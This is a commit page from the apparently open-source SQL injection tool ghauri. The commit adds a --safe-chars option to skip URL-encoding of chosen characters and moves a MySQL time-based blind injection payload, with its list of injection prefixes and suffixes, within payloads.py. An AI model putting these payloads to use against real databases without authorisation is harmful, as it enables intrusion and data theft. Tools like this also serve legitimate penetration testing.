crash.software
Projects
Pull Requests
Issues
Builds
ghauri
Code
Files
Commits
Branches
Tags
Pull Requests
Code Comments
Code Compare
Issues
Builds
Statistics
Child Projects
cra.sh
RESTful API
Projects STRLCPY ghauri Commits 721b1de2
🤬

  • added switch to skip specific characters from urlencoding, --safe-chars

  • Loading...
  • r0oth3x49 committed 1 year ago
    721b1de2
    1 parent b76f9400
  • ■ ■ ■ ■ ■
    ghauri/common/config.py
    skipped 93 lines
    94 94   self.req_counter_injected = 0
    95 95   self.params_count = 0
    96 96   self.confirm_payloads = False
     97 + self.safe_chars = None
    97 98   
    98 99   @property
    99 100   def session_filepath(self):
    skipped 7 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/common/payloads.py
    skipped 429 lines
    430 430   "dbms": "MySQL",
    431 431   },
    432 432   {
     433 + "payload": "IF(now()=sysdate(),SLEEP([SLEEPTIME]),0)",
     434 + "comments": [
     435 + {"pref": "'XOR(", "suf": ")XOR'Z"},
     436 + {"pref": '"XOR(', "suf": ')XOR"Z'},
     437 + {"pref": "", "suf": ""},
     438 + {"pref": "", "suf": "-- wXyW"},
     439 + {"pref": "'AND(", "suf": ")AND'Z"},
     440 + {"pref": "'OR(", "suf": ")OR'Z"},
     441 + {"pref": '"OR(', "suf": ')OR"Z'},
     442 + {"pref": " AND ", "suf": "-- wXyW"},
     443 + {"pref": "' AND ", "suf": "-- wXyW"},
     444 + {"pref": '" AND ', "suf": "-- wXyW"},
     445 + {"pref": ") AND ", "suf": "-- wXyW"},
     446 + {"pref": "') AND ", "suf": "-- wXyW"},
     447 + {"pref": '") AND ', "suf": "-- wXyW"},
     448 + # {"pref": ") OR ", "suf": "OR(1=1-- wXyW"},
     449 + # {"pref": "') OR ", "suf": "OR('1'='1 wXyW"},
     450 + # {"pref": '") OR ', "suf": 'OR("1"="1-- wXyW'},
     451 + ],
     452 + "title": "MySQL >= 5.0.12 time-based blind (IF - comment)",
     453 + "vector": "IF([INFERENCE],SLEEP([SLEEPTIME]),0)",
     454 + "dbms": "MySQL",
     455 + },
     456 + {
    433 457   "payload": "(SELECT CASE WHEN(1234=1234) THEN SLEEP([SLEEPTIME]) ELSE 0 END)",
    434 458   "comments": [
    435 459   {"pref": "'XOR", "suf": "XOR'Z"},
    skipped 19 lines
    455 479   ],
    456 480   "title": "MySQL >= 5.0.12 time-based blind (CASE STATEMENT)",
    457 481   "vector": "(SELECT CASE WHEN([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE 0 END)",
    458  - "dbms": "MySQL",
    459  - },
    460  - {
    461  - "payload": "IF(now()=sysdate(),SLEEP([SLEEPTIME]),0)",
    462  - "comments": [
    463  - {"pref": "'XOR(", "suf": ")XOR'Z"},
    464  - {"pref": '"XOR(', "suf": ')XOR"Z'},
    465  - {"pref": "", "suf": ""},
    466  - {"pref": "", "suf": "-- wXyW"},
    467  - {"pref": "'AND(", "suf": ")AND'Z"},
    468  - {"pref": "'OR(", "suf": ")OR'Z"},
    469  - {"pref": '"OR(', "suf": ')OR"Z'},
    470  - {"pref": " AND ", "suf": "-- wXyW"},
    471  - {"pref": "' AND ", "suf": "-- wXyW"},
    472  - {"pref": '" AND ', "suf": "-- wXyW"},
    473  - {"pref": ") AND ", "suf": "-- wXyW"},
    474  - {"pref": "') AND ", "suf": "-- wXyW"},
    475  - {"pref": '") AND ', "suf": "-- wXyW"},
    476  - # {"pref": ") OR ", "suf": "OR(1=1-- wXyW"},
    477  - # {"pref": "') OR ", "suf": "OR('1'='1 wXyW"},
    478  - # {"pref": '") OR ', "suf": 'OR("1"="1-- wXyW'},
    479  - ],
    480  - "title": "MySQL >= 5.0.12 time-based blind (IF - comment)",
    481  - "vector": "IF([INFERENCE],SLEEP([SLEEPTIME]),0)",
    482 482   "dbms": "MySQL",
    483 483   },
    484 484   {
    skipped 1580 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/common/utils.py
    skipped 1108 lines
    1109 1109   is_json = conf.is_json
    1110 1110   is_multipart = conf.is_multipart
    1111 1111   safe = (
    1112  - "/=*()[]&?%;,+\"'"
     1112 + "/=*()&?%;,+\"'"
    1113 1113   if conf.backend == "Microsoft SQL Server" and injection_type == "POST"
    1114  - else "[]/=*?&:;,+"
     1114 + else "/=*?&:;,+"
    1115 1115   )
     1116 + if conf.safe_chars:
     1117 + safe = f"{conf.safe_chars}{safe}"
    1116 1118   if not is_json and not key == "#1*":
    1117 1119   text = urlencode(
    1118 1120   value=text,
    skipped 920 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/ghauri.py
    skipped 85 lines
    86 86   skip_urlencoding=False,
    87 87   threads=None,
    88 88   confirm_payloads=False,
     89 + safe_chars=None,
    89 90  ):
    90 91   verbose_levels = {
    91 92   1: logging.INFO,
    skipped 5 lines
    97 98   is_custom_point = False
    98 99   conf.skip_urlencoding = skip_urlencoding
    99 100   conf.confirm_payloads = confirm_payloads
     101 + conf.safe_chars = safe_chars
    100 102   logger.start("starting")
    101 103   if not force_ssl:
    102 104   ssl._create_default_https_context = ssl._create_unverified_context
    skipped 99 lines
    202 204   )
    203 205   logger.end("ending")
    204 206   exit(0)
     207 + if conf.safe_chars:
     208 + logger.debug(
     209 + f'Ghauri is going to skip urlencoding for provided safe character(s): "{safe_chars}"'
     210 + )
    205 211   for injection_type in list(injection_points.keys()):
    206 212   if custom_injection_in:
    207 213   if "COOKIE" in custom_injection_in:
    skipped 609 lines
  • ■ ■ ■ ■ ■ ■
    ghauri/scripts/ghauri.py
    skipped 238 lines
    239 239   default=None,
    240 240   metavar="",
    241 241   )
     242 + injection.add_argument(
     243 + "--safe-chars",
     244 + dest="safe_chars",
     245 + type=str,
     246 + help='Skip URL encoding of specific character(s): (e.g:- --safe-chars="[]"',
     247 + default=None,
     248 + metavar="",
     249 + )
    242 250   detection = parser.add_argument_group(
    243 251   "Detection",
    244 252   description="These options can be used to customize the detection phase",
    skipped 192 lines
    437 445   skip_urlencoding=args.skip_urlencoding,
    438 446   threads=args.threads,
    439 447   confirm_payloads=args.confirm_payloads,
     448 + safe_chars=args.safe_chars,
    440 449   )
    441 450   if resp.is_injected:
    442 451   target = ghauri.Ghauri(
    skipped 71 lines
Please wait...
Page is in error, reload to recover